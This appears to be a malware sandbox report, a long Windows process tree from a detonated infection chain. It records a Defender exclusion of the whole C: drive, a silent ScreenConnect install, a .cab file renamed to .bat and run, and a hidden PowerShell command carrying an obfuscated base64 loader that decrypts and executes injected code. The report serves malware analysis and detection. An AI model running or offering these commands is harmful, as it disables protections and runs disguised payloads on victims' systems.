        
        C:\Windows\SysWOW64\msiexec.exe
        
        "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.4.4.9118\f63a82ffaf9f93d1\ScreenConnect.ClientSetup.msi"
        7⤵
        Enumerates connected drives
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1508
      - C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381560101\EPTwCQd.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4500
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4596
      - C:\Users\Admin\AppData\Local\Temp\10381570101\7a9f3697b2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381570101\7a9f3697b2.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4900
      - C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381580101\u75a1_003.exe"
        6⤵
        
        PID:208
        
        C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        
        PID:4284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4724
        
        C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        7⤵
        
        PID:2668
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        8⤵
        
        PID:4672
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath C:\
        9⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:12880
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Remove-MpPreference -ExclusionPath C:\
        9⤵
        
        PID:6748
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        8⤵
        
        PID:5788
        
        C:\Users\Admin\AppData\Local\Temp\{8c974534-3ad7-4e90-af31-f570fca06654}\17b22516.exe
        
        "C:\Users\Admin\AppData\Local\Temp\{8c974534-3ad7-4e90-af31-f570fca06654}\17b22516.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot
        9⤵
        
        PID:8624
        
        C:\Users\Admin\AppData\Local\Temp\{d1781515-8e26-47c9-bf34-a5609b91b72a}\cbc1762b.exe
        
        C:/Users/Admin/AppData/Local/Temp/{d1781515-8e26-47c9-bf34-a5609b91b72a}/\cbc1762b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot
        10⤵
        
        PID:9912
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\{0151554c-1b0e-4271-a505-48ece38b8685}\26409982-ecd6-4488-8672-81e093803f43.cmd" "
        11⤵
        
        PID:10252
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:10472
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10524
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10636
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10760
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10872
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10956
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:11052
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11160
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11252
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11296
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11384
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11520
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11612
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11696
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11780
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11864
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:11960
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12024
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12100
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6356
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:12264
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:6244
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6372
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:6416
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6468
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12304
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:12384
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:12516
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12636
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:12732
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6824
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:6920
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:2620
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:1800
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1456
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:8800
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1944
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:10972
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:6160
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:6564
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:12532
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6984
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:4760
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:2720
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:3260
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:5060
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:7240
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:7320
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:7396
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:7468
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:7540
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:7624
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:7692
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:7748
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7824
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:7912
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:7992
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:8076
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8152
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:4564
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:2372
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:5780
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4524
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8240
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:8312
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:8404
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:8512
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:8604
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:8692
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:8760
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:8848
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:8928
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:9028
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:9124
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:9212
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:9228
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:9324
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:9420
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:9508
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:9604
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:9688
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:9764
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:9872
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:9948
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:10032
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10132
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:10220
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10248
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10336
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:10400
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:10492
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10568
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:3452
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10704
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10764
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:10856
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:10936
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11004
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11092
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11176
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:4440
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11292
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:11372
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11448
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11532
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:11620
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11700
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:11776
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11860
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:11924
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6384
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6264
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:6164
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:12248
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:12164
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6240
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12020
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:11980
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6456
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6520
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12328
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12408
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12476
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:12852
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12776
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12692
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:12588
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:12536
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:4860
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:5068
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:13044
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:13152
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:13200
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:13140
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:13136
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:12884
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:13308
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:6660
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        Runs ping.exe
        
        PID:6676
        
        C:\Windows\system32\PING.EXE
        
        ping 127.0.0.1 -n 1
        12⤵
        
        PID:5232
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce /v 26409982-ecd6-4488-8672-81e093803f43 /f
        12⤵
        Modifies registry key
        
        PID:13056
      - C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381590101\7IIl2eE.exe"
        6⤵
        
        PID:536
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        
        PID:1968
      - C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10381610101\Rm3cVPI.exe"
        6⤵
        
        PID:6836
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"
        6⤵
        
        PID:7124
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10381621121\5YB5L4K.cmd"
        7⤵
        
        PID:1276
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF